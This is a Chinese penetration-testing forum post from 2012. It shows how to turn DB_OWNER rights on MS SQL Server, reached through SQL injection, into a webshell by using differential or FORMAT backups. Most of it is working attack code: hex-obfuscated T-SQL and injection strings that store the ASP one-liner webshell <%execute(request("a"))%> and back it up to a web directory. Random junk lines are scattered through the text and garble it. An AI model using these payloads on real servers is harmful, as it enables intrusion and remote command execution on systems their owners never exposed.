中国网络渗透测试联盟
标题:
DB_OWNER权限得到webshell的改进办法
[打印本页]
作者:
admin
时间:
2012-11-9 21:31
标题:
DB_OWNER权限得到webshell的改进办法
DB_OWNER权限得到webshell的两点改进:
1 w2 g0 P# L) X0 l7 v8 H
& F' I5 T- p ^, {, y* j2 v1 V
减少备份文件大小,得到可执行的webshell成功率提高不少
! a# }/ f, b( |0 R
一利用差异备份
9 c9 n+ X3 Z2 V, s0 T. W6 r( F& g, V
加一个参数WITH DIFFERENTIAL
0 J- w! m+ X) Y3 R- h
+ b; j4 ?/ Q n
1
, M" N/ b8 M' }( J
2
( d. Y' _5 H( M, V8 M
3
3 D6 G8 [; s1 h d6 ^: ?
4
- @6 S0 q G0 l3 t2 i1 g
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
/ P" J C; H5 {
create table [dbo].[xiaolu] ([cmd] [image]);
' z7 E3 P+ ~0 G& m" R" x$ P
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
% ^" o* ]# F1 f7 @2 w
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
5 Y3 s7 R8 E' R
" _# x8 D% [7 U7 r* U
二利用完全FORMAT
. [: Y w$ w3 s3 h$ x0 c3 b
加一个参数WITH FROMAT
o7 n- X# ]' _2 ^ m7 ]
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
7 H a9 ~9 K% b" _, a( R# S' J6 A& k
. z, F6 i/ |$ f1 {0 M
1
% V8 u1 a ~% @2 ~# m
2
/ o' J2 x4 Y {. [- M
3
4 l1 z: a* O0 X) k( {3 ]# \' a
4
' ~2 L3 R5 Z8 O3 q; K' ^% V/ [
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
2 `' ] U$ v) o' L3 l* o. K
create table [dbo].[xiaolu] ([cmd] [image]);
2 W- s1 u& h O7 G2 Y
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
) H+ s$ Q% ^. U4 p. P
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
. ^4 p: q2 R ?/ M6 K5 }
# _' O) s% X1 U$ U/ \/ z
总的来说就是那么简单几句,下面以备份数据库model为例子
/ s8 S4 E. H4 H$ m0 W- B
1
; z0 n5 L; z* D, C* v
7 f4 p4 T; H- X8 M. ]
1
+ W% h B0 T5 y+ D7 L/ K+ ?
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
+ K# v& B; }; c- f+ I" d
- g* l& C* m) \0 G+ A
2
6 b4 i% @! ^4 K0 c
3 \6 r/ Y2 Z$ c% E0 X6 {
1
8 {, p: u% r' d8 `; |
id=1;backup database model to disk='你的路径‘ with differential,format;--
' a G8 H* v) O, A+ x% S
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2